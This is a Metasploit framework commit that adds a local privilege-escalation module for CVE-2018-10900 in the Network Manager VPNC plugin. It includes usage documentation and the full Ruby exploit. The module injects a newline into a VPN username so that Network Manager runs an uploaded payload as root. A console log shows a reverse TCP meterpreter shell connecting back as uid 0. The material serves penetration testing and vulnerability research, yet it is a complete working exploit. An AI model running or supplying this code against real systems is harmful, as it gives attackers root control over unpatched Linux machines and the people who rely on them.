Land #10482, Add Network Manager VPNC Privesc

4.x 4.17.9
Shelby Pace 2018-08-30 10:46:54 -05:00 committed by Metasploit
parent d7728afe42
commit bc87643ea3
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 239 additions and 0 deletions

View File

@ -0,0 +1,91 @@
## Description
This module exploits an injection vulnerability in the Network Manager
VPNC plugin to gain *root* privileges.
This module uses a new line injection vulnerability in the configured
username for a VPN network connection to inject a `Password helper`
configuration directive into the connection configuration.
The specified helper is executed by Network Manager as root when the
connection is started.
Network Manager VPNC versions prior to 1.2.6 are vulnerable.
## Vulnerable Application
This module has been tested successfully with VPNC versions:
* 1.2.4-4 on Debian 9.0.0 (x64); and
* 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
## Installation
The following installation instructions are for Ubuntu 16.04.04.
```sh
# List available network-manager-vpnc packages
apt-cache showpkg network-manager-vpnc
# Install a vulnerable package
apt-get install network-manager-vpnc=1.1.93-1
```
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/linux/local/network_manager_vpnc_username_priv_esc`
4. Do: `set SESSION [SESSION]`
5. Do: `run`
6. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
```
msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] nmcli utility is installed
[*] Adding VPN connection...
[*] Uploading payload...
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ...
[*] Starting VPN connection...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 172.16.191.201
[+] Deleted /tmp/.4FCA0Pp4tw
[*] Removing VPN connection...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.201
OS : Ubuntu 16.04 (Linux 4.13.0-41-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

View File

@ -0,0 +1,148 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Network Manager VPNC Username Privilege Escalation',
'Description' => %q{
This module exploits an injection vulnerability in the Network Manager
VPNC plugin to gain root privileges.
This module uses a new line injection vulnerability in the configured
username for a VPN network connection to inject a `Password helper`
configuration directive into the connection configuration.
The specified helper is executed by Network Manager as root when the
connection is started.
Network Manager VPNC versions prior to 1.2.6 are vulnerable.
This module has been tested successfully with VPNC versions:
1.2.4-4 on Debian 9.0.0 (x64); and
1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Jul 26 2018',
'References' =>
[
['CVE', '2018-10900'],
['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
['URL', 'https://www.debian.org/security/2018/dsa-4253'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def check
unless command_exists? 'nmcli'
vprint_error 'Network Manager nmcli utility is not installed'
return CheckCode::Safe
end
vprint_good 'nmcli utility is installed'
CheckCode::Detected
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
if check != CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
@payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
payload_path = "#{base_dir}/#{@payload_name}"
print_status 'Adding VPN connection...'
vpn_data = []
vpn_data << '+vpn.data "IKE DH Group = dh2"'
vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
vpn_data << '+vpn.data "IPSec secret-flags = 4"'
vpn_data << '+vpn.data "Local Port = 0"'
vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
vpn_data << '+vpn.data "Vendor = cisco"'
vpn_data << '+vpn.data "Xauth password-flags = 4"'
vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
if res.include? 'Error'
fail_with Failure::Unknown, 'Could not create VPN connection'
end
res = cmd_exec 'nmcli connection'
unless res.include? @payload_name
fail_with Failure::Unknown, 'Could not create VPN connection'
end
print_status 'Uploading payload...'
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Starting VPN connection...'
cmd_exec "nmcli connection up #{@payload_name} & echo "
end
def cleanup
print_status 'Removing VPN connection...'
res = cmd_exec "nmcli connection delete #{@payload_name}"
unless res.include? 'successfully deleted'
print_warning "Could not remove VPN connection #{@payload_name}"
end
super
end
end